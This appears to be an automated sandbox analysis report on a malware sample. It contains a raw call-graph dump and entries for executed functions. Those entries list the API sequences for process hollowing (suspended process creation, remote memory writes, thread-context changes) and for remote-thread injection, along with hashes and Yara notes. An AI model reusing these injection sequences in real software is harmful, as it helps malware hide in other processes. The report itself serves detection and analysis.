14947 ac03be __Getctype 12 API calls 14944->14947 14948 ac1033 __Getctype 6 API calls 14945->14948 14946->14934 14949 ac0779 14947->14949 14948->14942 14950 ac0ac8 ___free_lconv_mon 12 API calls 14949->14950 14950->14934 14952 ac025e __FrameHandler3::FrameUnwindToState 14951->14952 14965 abca85 EnterCriticalSection 14952->14965 14954 ac0268 14966 ac0298 14954->14966 14957 ac0364 14958 ac0370 __FrameHandler3::FrameUnwindToState 14957->14958 14970 abca85 EnterCriticalSection 14958->14970 14965->14954 14969 abcacd LeaveCriticalSection 14966->14969 14968 ac0286 14968->14957 14969->14968 15094 ac13aa 15053->15094 15056 ac14bd 15057 ac14c9 __FrameHandler3::FrameUnwindToState 15056->15057 15058 ac06e1 __Wcrtomb 14 API calls 15057->15058 15062 ac14f6 _unexpected 15057->15062 15063 ac14f0 _unexpected 15057->15063 15058->15063 15059 ac153d 15060 abd381 __Wcrtomb 14 API calls 15059->15060 15061 ac1542 15060->15061 15105 aba48f 15061->15105 15065 ac1569 15062->15065 15108 abca85 EnterCriticalSection 15062->15108 15063->15059 15063->15062 15066 ac1527 15063->15066 15069 ac169c 15065->15069 15070 ac15ab 15065->15070 15080 ac15da 15065->15080 15066->14878 15072 ac16a7 15069->15072 15140 abcacd LeaveCriticalSection 15069->15140 15070->15080 15109 ac0590 GetLastError 15070->15109 15074 abe451 _unexpected 23 API calls 15072->15074 15076 ac16af 15074->15076 15077 ac0590 __Getctype 42 API calls 15081 ac162f 15077->15081 15079 ac0590 __Getctype 42 API calls 15079->15080 15136 ac1649 15080->15136 15081->15066 15082 ac0590 __Getctype 42 API calls 15081->15082 15082->15066 15084 aba2af _unexpected codecvt 15083->15084 15085 aba2db IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15084->15085 15086 aba3ac _unexpected 15085->15086 15165 ab5a66 15086->15165 15088 aba3ca 15088->14881 15090 ac0da3 __purecall 5 API calls 15089->15090 15091 ac110c 15090->15091 15092 ac112a InitializeCriticalSectionAndSpinCount 15091->15092 15093 ac1115 15091->15093 15092->15093 15093->14893 15095 ac13b6 __FrameHandler3::FrameUnwindToState 15094->15095 15100 abca85 EnterCriticalSection 15095->15100 15097 ac13c4 15101 ac1402 15097->15101 15100->15097 15104 abcacd LeaveCriticalSection 15101->15104 15103 abb176 15103->14878 15103->15056 15104->15103 15141 aba3db 15105->15141 15108->15065 15110 ac05a6 15109->15110 15111 ac05ac 15109->15111 15112 ac0ff4 __Getctype 6 API calls 15110->15112 15113 ac1033 __Getctype 6 API calls 15111->15113 15115 ac05b0 SetLastError 15111->15115 15112->15111 15114 ac05c8 15113->15114 15114->15115 15117 ac0a6b _unexpected 14 API calls 15114->15117 15118 ac0645 15115->15118 15119 ac0640 15115->15119 15120 ac05dd 15117->15120 15123 abb171 __purecall 40 API calls 15118->15123 15119->15079 15121 ac05e5 15120->15121 15122 ac05f6 15120->15122 15124 ac1033 __Getctype 6 API calls 15121->15124 15125 ac1033 __Getctype 6 API calls 15122->15125 15126 ac064a 15123->15126 15127 ac05f3 15124->15127 15128 ac0602 15125->15128 15132 ac0ac8 ___free_lconv_mon 14 API calls 15127->15132 15129 ac061d 15128->15129 15130 ac0606 15128->15130 15132->15115 15137 ac164f 15136->15137 15139 ac1620 15136->15139 15164 abcacd LeaveCriticalSection 15137->15164 15139->15066 15139->15077 15139->15081 15140->15072 15142 aba3ed _Fputc 15141->15142 15147 aba412 15142->15147 15144 aba405 15158 aba1cb 15144->15158 15148 aba429 15147->15148 15149 aba422 15147->15149 15151 aba207 _Fputc GetLastError SetLastError 15148->15151 15154 aba437 15148->15154 15150 aba230 _Fputc 16 API calls 15149->15150 15150->15148 15152 aba45e 15151->15152 15153 aba4bc __Getctype 11 API calls 15152->15153 15152->15154 15155 aba48e 15153->15155 15154->15144 15159 aba1d7 15158->15159 15164->15139 15166 ab5a6f IsProcessorFeaturePresent 15165->15166 15167 ab5a6e 15165->15167 15169 ab627c 15166->15169 15167->15088 15172 ab623f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15169->15172 15171 ab635f 15171->15088 15172->15171 15174 ac6483 __FrameHandler3::FrameUnwindToState 15173->15174 15175 ac649d 15174->15175 15219 abca85 EnterCriticalSection 15174->15219 15177 ac634c 15175->15177 15179 abb171 __purecall 42 API calls 15175->15179 15184 ac60a2 15177->15184 15180 ac6516 15179->15180 15181 ac64ad 15182 ac0ac8 ___free_lconv_mon 14 API calls 15181->15182 15183 ac64d9 15181->15183 15182->15183 15220 ac64f6 15183->15220 15224 abd394 15184->15224 15187 ac60d5 15189 ac60ec 15187->15189 15190 ac60da GetACP 15187->15190 15188 ac60c3 GetOEMCP 15188->15189 15189->14839 15191 ac3c5d 15189->15191 15190->15189 15192 ac3c9b 15191->15192 15193 ac3c6b 15191->15193 15194 abd381 __Wcrtomb 14 API calls 15192->15194 15195 ac3c86 HeapAlloc 15193->15195 15198 ac3c6f _unexpected 15193->15198 15197 ac3ca0 15194->15197 15196 ac3c99 15195->15196 15195->15198 15196->15197 15197->14835 15197->14836 15198->15192 15198->15195 15199 abd8a9 codecvt 2 API calls 15198->15199 15199->15198 15201 ac60a2 44 API calls 15200->15201 15202 ac6592 15201->15202 15203 ac660b codecvt 15202->15203 15204 ac65cf IsValidCodePage 15202->15204 15205 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15203->15205 15204->15203 15206 ac65e1 15204->15206 15207 ac63b9 15205->15207 15208 ac6610 GetCPInfo 15206->15208 15210 ac65ea codecvt 15206->15210 15207->14841 15207->14845 15208->15203 15208->15210 15266 ac6176 15210->15266 15219->15181 15223 abcacd LeaveCriticalSection 15220->15223 15222 ac64fd 15222->15175 15223->15222 15225 abd3ab 15224->15225 15226 abd3b2 15224->15226 15225->15187 15225->15188 15226->15225 15227 ac0590 __Getctype 42 API calls 15226->15227 15228 abd3d3 15227->15228 15232 ac09af 15228->15232 15233 abd3e9 15232->15233 15234 ac09c2 15232->15234 15236 ac0a0d 15233->15236 15234->15233 15240 ac7efd 15234->15240 15237 ac0a20 15236->15237 15239 ac0a35 15236->15239 15237->15239 15261 ac655f 15237->15261 15239->15225 15241 ac7f09 __FrameHandler3::FrameUnwindToState 15240->15241 15242 ac0590 __Getctype 42 API calls 15241->15242 15243 ac7f12 15242->15243 15244 ac7f58 15243->15244 15253 abca85 EnterCriticalSection 15243->15253 15244->15233 15246 ac7f30 15254 ac7f7e 15246->15254 15253->15246 15255 ac7f8c __Getctype 15254->15255 15257 ac7f41 15254->15257 15256 ac7cb1 __Getctype 14 API calls 15255->15256 15255->15257 15256->15257 15258 ac7f5d 15257->15258 15259 abcacd std::_Lockit::~_Lockit LeaveCriticalSection 15258->15259 15262 ac0590 __Getctype 42 API calls 15261->15262 15263 ac6564 15262->15263 15264 ac6477 __strnicoll 42 API calls 15263->15264 15265 ac656f 15264->15265 15265->15239 15267 ac619e GetCPInfo 15266->15267 15276 ac6267 15266->15276 15267->15276 15374 ac0154 15373->15374 15375 ac0162 15373->15375 15374->15375 15378 ac017a 15374->15378 15376 abd381 __Wcrtomb 14 API calls 15375->15376 15381 ac016a 15376->15381 15377 aba48f __strnicoll 42 API calls 15379 ac0174 15377->15379 15378->15379 15380 abd381 __Wcrtomb 14 API calls 15378->15380 15379->14793 15380->15381 15381->15377 15386 abdf6b 15382->15386 15387 abdf9a 15382->15387 15383 abdfb1 15384 ac0ac8 ___free_lconv_mon 14 API calls 15383->15384 15384->15386 15385 ac0ac8 ___free_lconv_mon 14 API calls 15385->15387 15386->14795 15387->15383 15387->15385 15389 aba4c8 15388->15389 15390 aba293 _unexpected 8 API calls 15389->15390 15391 aba4dd GetCurrentProcess TerminateProcess 15390->15391 15391->14801 15393 ab5a2d ___std_exception_copy 15392->15393 15394 ab3110 15393->15394 15395 abd8a9 codecvt 2 API calls 15393->15395 15396 ab5a49 codecvt 15393->15396 15401 abb0d5 15394->15401 15395->15393 15397 ab621c codecvt 15396->15397 15428 ab687d 15396->15428 15398 ab687d CallUnexpected RaiseException 15397->15398 15400 ab6239 15398->15400 15402 abb0e2 15401->15402 15403 abb0f6 15401->15403 15404 abd381 __Wcrtomb 14 API calls 15402->15404 15431 abb085 15403->15431 15406 abb0e7 15404->15406 15408 aba48f __strnicoll 42 API calls 15406->15408 15410 abb0f2 15408->15410 15409 abb10b CreateThread 15411 abb12a GetLastError 15409->15411 15412 abb136 15409->15412 15456 abaf79 15409->15456 15410->14580 15440 abd327 15411->15440 15445 abaff7 15412->15445 15417 ab32de 15416->15417 15418 ab32ac 15416->15418 15417->14591 15419 ab32c9 FindCloseChangeNotification 15418->15419 15420 ab32b3 GetExitCodeThread 15418->15420 15419->15417 15420->15417 15421 ab32c4 15420->15421 15421->15419 15423 ab3461 std::_Throw_Cpp_error 15422->15423 15496 ab336b 15423->15496 15429 ab6897 15428->15429 15430 ab68c4 RaiseException 15428->15430 15429->15430 15430->15397 15432 ac0a6b _unexpected 14 API calls 15431->15432 15433 abb096 15432->15433 15434 ac0ac8 ___free_lconv_mon 14 API calls 15433->15434 15435 abb0a3 15434->15435 15436 abb0aa GetModuleHandleExW 15435->15436 15437 abb0c7 15435->15437 15436->15437 15438 abaff7 16 API calls 15437->15438 15439 abb0cf 15438->15439 15439->15409 15439->15412 15453 abd36e 15440->15453 15442 abd332 __dosmaperr 15443 abd381 __Wcrtomb 14 API calls 15442->15443 15444 abd345 15443->15444 15444->15412 15446 abb003 15445->15446 15452 abb027 15445->15452 15447 abb009 CloseHandle 15446->15447 15448 abb012 15446->15448 15447->15448 15449 abb018 FreeLibrary 15448->15449 15450 abb021 15448->15450 15449->15450 15451 ac0ac8 ___free_lconv_mon 14 API calls 15450->15451 15451->15452 15452->14580 15454 ac06e1 __Wcrtomb 14 API calls 15453->15454 15455 abd373 15454->15455 15455->15442 15457 abaf85 __FrameHandler3::FrameUnwindToState 15456->15457 15458 abaf99 15457->15458 15459 abaf8c GetLastError ExitThread 15457->15459 15460 ac0590 __Getctype 42 API calls 15458->15460 15461 abaf9e 15460->15461 15470 ac1335 15461->15470 15464 abafb5 15475 abb158 15464->15475 15471 abafa9 15470->15471 15472 ac1347 GetPEB 15470->15472 15471->15464 15478 ac1240 15471->15478 15472->15471 15473 ac135a 15472->15473 15481 ac0e66 15473->15481 15484 abb02e 15475->15484 15479 ac0da3 __purecall 5 API calls 15478->15479 15480 ac125c 15479->15480 15480->15464 15482 ac0da3 __purecall 5 API calls 15481->15482 15483 ac0e82 15482->15483 15483->15471 15485 ac06e1 __Wcrtomb 14 API calls 15484->15485 15487 abb039 15485->15487 15486 abb07b ExitThread 15487->15486 15488 abb052 15487->15488 15493 ac127b 15487->15493 15490 abb065 15488->15490 15491 abb05e CloseHandle 15488->15491 15490->15486 15492 abb071 FreeLibraryAndExitThread 15490->15492 15491->15490 15492->15486 15494 ac0da3 __purecall 5 API calls 15493->15494 15495 ac1294 15494->15495 15495->15488 15497 ab3377 __EH_prolog3_GS 15496->15497 15506 ab1770 15497->15506 15507 ab1791 15506->15507 15507->15507 15540 ab11c0 15507->15540 15509 ab17a3 15510 ab1c80 15509->15510 15511 ab1ca8 15510->15511 15512 ab1e65 15511->15512 15515 ab1cb9 15511->15515 15513 ab2830 std::_Throw_Cpp_error 43 API calls 15512->15513 15514 ab1e6a 15513->15514 15516 aba49f std::_Throw_Cpp_error 42 API calls 15514->15516 15518 ab1100 std::_Throw_Cpp_error 43 API calls 15515->15518 15523 ab1cbe codecvt 15515->15523 15517 ab1e6f 15516->15517 15519 aba49f std::_Throw_Cpp_error 42 API calls 15517->15519 15518->15523 15520 ab1e74 15519->15520 15522 ab67fb ___std_exception_copy 42 API calls 15520->15522 15521 ab1daa std::ios_base::_Ios_base_dtor 15524 ab67fb ___std_exception_copy 42 API calls 15521->15524 15523->15514 15523->15521 15526 ab1dff 15524->15526 15526->15517 15527 ab1e30 std::ios_base::_Ios_base_dtor 15526->15527 15528 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15527->15528 15529 ab1e5f 15528->15529 15541 ab1249 15540->15541 15545 ab11d0 15540->15545 15582 ab2830 15541->15582 15542 ab11d5 codecvt 15542->15509 15545->15542 15548 ab1100 15545->15548 15547 ab1223 codecvt 15547->15509 15549 ab1133 15548->15549 15550 ab1110 15548->15550 15553 ab1144 15549->15553 15555 ab5a28 codecvt 3 API calls 15549->15555 15551 ab114a 15550->15551 15552 ab1117 15550->15552 15596 ab2800 15551->15596 15554 ab5a28 codecvt 3 API calls 15552->15554 15553->15547 15557 ab111d 15554->15557 15558 ab113d 15555->15558 15560 ab1126 15557->15560 15600 aba49f 15557->15600 15558->15547 15560->15547 15605 ab324a 15582->15605 15597 ab280b codecvt 15596->15597 15598 ab687d CallUnexpected RaiseException 15597->15598 15599 ab281a 15598->15599 15601 aba3db __strnicoll 42 API calls 15600->15601 15602 aba4ae 15601->15602 15603 aba4bc __Getctype 11 API calls 15602->15603 15604 aba4bb 15603->15604 15610 ab31c4 15605->15610 15608 ab687d CallUnexpected RaiseException 15609 ab3269 15608->15609 15613 ab1f70 15610->15613 15616 ab67fb 15613->15616 15617 ab6808 ___std_exception_copy 15616->15617 15621 ab1f9e 15616->15621 15618 ac0146 ___std_exception_copy 42 API calls 15617->15618 15620 ab6835 15617->15620 15617->15621 15618->15620 15619 abc9fc ~ctype 14 API calls 15619->15621 15620->15619 15621->15608 15627 abe2a2 15626->15627 15628 abe2b4 15626->15628 15653 abe33d GetModuleHandleW 15627->15653 15638 abe13d 15628->15638 15633 ab5cd5 15633->14632 15639 abe149 __FrameHandler3::FrameUnwindToState 15638->15639 15661 abca85 EnterCriticalSection 15639->15661 15641 abe153 15662 abe18a 15641->15662 15643 abe160 15666 abe17e 15643->15666 15646 abe30c 15691 abe380 15646->15691 15649 abe32a 15651 abe3a2 _unexpected 3 API calls 15649->15651 15650 abe31a GetCurrentProcess TerminateProcess 15650->15649 15652 abe332 ExitProcess 15651->15652 15654 abe2a7 15653->15654 15654->15628 15655 abe3a2 GetModuleHandleExW 15654->15655 15656 abe402 15655->15656 15657 abe3e1 GetProcAddress 15655->15657 15658 abe408 FreeLibrary 15656->15658 15659 abe2b3 15656->15659 15657->15656 15660 abe3f5 15657->15660 15658->15659 15659->15628 15660->15656 15661->15641 15663 abe196 __FrameHandler3::FrameUnwindToState 15662->15663 15665 abe1fd _unexpected 15663->15665 15669 abff0f 15663->15669 15665->15643 15690 abcacd LeaveCriticalSection 15666->15690 15668 abe16c 15668->15633 15668->15646 15670 abff1b __EH_prolog3 15669->15670 15673 abfc67 15670->15673 15672 abff42 codecvt 15672->15665 15674 abfc73 __FrameHandler3::FrameUnwindToState 15673->15674 15681 abca85 EnterCriticalSection 15674->15681 15676 abfc81 15682 abfe1f 15676->15682 15681->15676 15683 abfc8e 15682->15683 15684 abfe3e 15682->15684 15686 abfcb6 15683->15686 15684->15683 15685 ac0ac8 ___free_lconv_mon 14 API calls 15684->15685 15685->15683 15689 abcacd LeaveCriticalSection 15686->15689 15688 abfc9f 15688->15672 15689->15688 15690->15668 15696 ac1379 GetPEB 15691->15696 15694 abe38a GetPEB 15695 abe316 15694->15695 15695->15649 15695->15650 15697 abe385 15696->15697 15698 ac1393 15696->15698 15697->15694 15697->15695 15700 ac0e26 15698->15700 15701 ac0da3 __purecall 5 API calls 15700->15701 15702 ac0e42 15701->15702 15702->15697 15704 ac06e1 __Wcrtomb 14 API calls 15703->15704 15705 abafe8 15704->15705 15705->14551 15707 ac00d4 ___scrt_uninitialize_crt 15706->15707 15708 ac00c2 15706->15708 15707->14626 15709 ac00d0 15708->15709 15711 abbe34 15708->15711 15709->14626 15714 abbcc1 15711->15714 15717 abbbb5 15714->15717 15718 abbbc1 __FrameHandler3::FrameUnwindToState 15717->15718 15725 abca85 EnterCriticalSection 15718->15725 15720 abbbcb ___scrt_uninitialize_crt 15721 abbc37 15720->15721 15726 abbb29 15720->15726 15725->15720 18279 ac0457 18280 ac0462 18279->18280 18284 ac0472 18279->18284 18285 ac0478 18280->18285 18283 ac0ac8 ___free_lconv_mon 14 API calls 18283->18284 18286 ac048d 18285->18286 18287 ac0493 18285->18287 18288 ac0ac8 ___free_lconv_mon 14 API calls 18286->18288 18289 ac0ac8 ___free_lconv_mon 14 API calls 18287->18289 18288->18287 18290 ac049f 18289->18290 18291 ac0ac8 ___free_lconv_mon 14 API calls 18290->18291 18292 ac04aa 18291->18292 18293 ac0ac8 ___free_lconv_mon 14 API calls 18292->18293 18294 ac04b5 18293->18294 18295 ac0ac8 ___free_lconv_mon 14 API calls 18294->18295 18296 ac04c0 18295->18296 18297 ac0ac8 ___free_lconv_mon 14 API calls 18296->18297 18298 ac04cb 18297->18298 18299 ac0ac8 ___free_lconv_mon 14 API calls 18298->18299 18300 ac04d6 18299->18300 18301 ac0ac8 ___free_lconv_mon 14 API calls 18300->18301 18302 ac04e1 18301->18302 18303 ac0ac8 ___free_lconv_mon 14 API calls 18302->18303 18304 ac04ec 18303->18304 18305 ac0ac8 ___free_lconv_mon 14 API calls 18304->18305 18306 ac04fa 18305->18306 18311 ac02a4 18306->18311 18312 ac02b0 __FrameHandler3::FrameUnwindToState 18311->18312 18327 abca85 EnterCriticalSection 18312->18327 18314 ac02e4 18328 ac0303 18314->18328 18317 ac02ba 18317->18314 18318 ac0ac8 ___free_lconv_mon 14 API calls 18317->18318 18318->18314 18319 ac030f 18320 ac031b __FrameHandler3::FrameUnwindToState 18319->18320 18332 abca85 EnterCriticalSection 18320->18332 18322 ac0325 18323 ac0545 __Getctype 14 API calls 18322->18323 18324 ac0338 18323->18324 18333 ac0358 18324->18333 18327->18317 18331 abcacd LeaveCriticalSection 18328->18331 18330 ac02f1 18330->18319 18331->18330 18332->18322 18336 abcacd LeaveCriticalSection 18333->18336 18335 ac0346 18335->18283 18336->18335

                                                                                Executed Functions

                                                                                Function 0149018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 014902FC
                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0149030F
                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0149032D
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01490351
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0149037C
                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 014903D4
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0149041F
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149045D
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01490499
                                                                                • ResumeThread.KERNELBASE(?), ref: 014904A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1951644279.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1490000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                • String ID: GetP$Load$aryA$ress
                                                                                • API String ID: 2687962208-977067982
                                                                                • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                • Instruction ID: fe5aaef3fff1a33323b1d95de8c657ade2fc26dad308b74ee9beb8ed128bd5b1
                                                                                • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                • Instruction Fuzzy Hash: 78B1E67260024AAFDB60CF68CC80BDA77A9FF88714F158565EA0CEB351D774FA418B94
                                                                                Function 00AB2ED0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186memorysynchronizationthreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00AB2F82
                                                                                • CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,?,00AD8038,00000000,00000000), ref: 00AB308A
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00AB3093
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocCreateObjectRemoteSingleThreadVirtualWait
                                                                                • String ID: 0000000006:1@0000000005:@$Unknown exception
                                                                                • API String ID: 3786092462-2488675128
                                                                                • Opcode ID: d911740bc3f0809c022130326ed08dad356185615d1c08636abd57989ba82d99
                                                                                • Instruction ID: 0acb0a8a23c61f27172a90887783b30e3fac7352bb6208a0f5d6f13582f3c621
                                                                                • Opcode Fuzzy Hash: d911740bc3f0809c022130326ed08dad356185615d1c08636abd57989ba82d99
                                                                                • Instruction Fuzzy Hash: B65125B2A043409FD714EF34CC85BABBBE8AF99740F104A2DF99597283D770E6498752
                                                                                Function 00AB22A0 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                • String ID: AAA$Zero
                                                                                • API String ID: 909987262-2547618886
                                                                                • Opcode ID: f6dbdaf813c6dc86a2b908d379a46ab16339cb9d5c745ef7ddf53e4f5d825abc
                                                                                • Instruction ID: aef57259d25d150d177cfaa70aa291caf6e47574ecb8564edcd95081fe0d87a8
                                                                                • Opcode Fuzzy Hash: f6dbdaf813c6dc86a2b908d379a46ab16339cb9d5c745ef7ddf53e4f5d825abc
                                                                                • Instruction Fuzzy Hash: D381CC709083848FC315DF28C9847AABBE4BFD9308F148A6EE4D88B253C375D948CB52
                                                                                Function 00AC1335 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e958c4940cc239054154ca8a26f47bc97a62700420abd0387d75b9b13c3e8ec
                                                                                • Instruction ID: ea1aeca91db26d22b32a73ebc8e2f4d96d7fccc387ecf1e342855896a3d1718b
                                                                                • Opcode Fuzzy Hash: 9e958c4940cc239054154ca8a26f47bc97a62700420abd0387d75b9b13c3e8ec
                                                                                • Instruction Fuzzy Hash: 39F0A032710664DBCB12D748C505F8973BCEB06B55F12009AF200DB251C770EE00CBC0
                                                                                Function 00AC0CD8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 23 ac0cd8-ac0ce4 24 ac0d76-ac0d79 23->24 25 ac0d7f 24->25 26 ac0ce9-ac0cfa 24->26 29 ac0d81-ac0d85 25->29 27 ac0cfc-ac0cff 26->27 28 ac0d07-ac0d20 LoadLibraryExW 26->28 30 ac0d9f-ac0da1 27->30 31 ac0d05 27->31 32 ac0d86-ac0d96 28->32 33 ac0d22-ac0d2b GetLastError 28->33 30->29 35 ac0d73 31->35 32->30 34 ac0d98-ac0d99 FreeLibrary 32->34 36 ac0d2d-ac0d3f call ac0218 33->36 37 ac0d64-ac0d71 33->37 34->30 35->24 36->37 40 ac0d41-ac0d53 call ac0218 36->40 37->35 40->37 43 ac0d55-ac0d62 LoadLibraryExW 40->43 43->32 43->37
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,83CA0057,?,00AC0DE5,?,?,?,00000000), ref: 00AC0D99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3664257935-537541572
                                                                                • Opcode ID: 31fef8f62426999081fc5de0ed9661db7dc1307792c3975bc4040ebd01f198d9
                                                                                • Instruction ID: 5053de23bc0b6912dbb030fc063edc18a63e2bd97ac7211485e9cf48a8820f5f
                                                                                • Opcode Fuzzy Hash: 31fef8f62426999081fc5de0ed9661db7dc1307792c3975bc4040ebd01f198d9
                                                                                • Instruction Fuzzy Hash: 7B21C035A41211EBCB229BA4EC44F9A3769EB417B0B260628F917A7290EB70FD01C6D1
                                                                                Function 00AB3100 Relevance: 9.0, APIs: 6, Instructions: 47threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FreeConsole.KERNELBASE ref: 00AB3103
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AB3148
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB3176
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB317D
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB3184
                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00AB318B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cpp_errorThrow_std::_$ConsoleCurrentFreeThread
                                                                                • String ID:
                                                                                • API String ID: 4273603408-0
                                                                                • Opcode ID: 239056730ff4087a25dfda539603b8cb7fedc83c5ed98b88d9718c298bb30b82
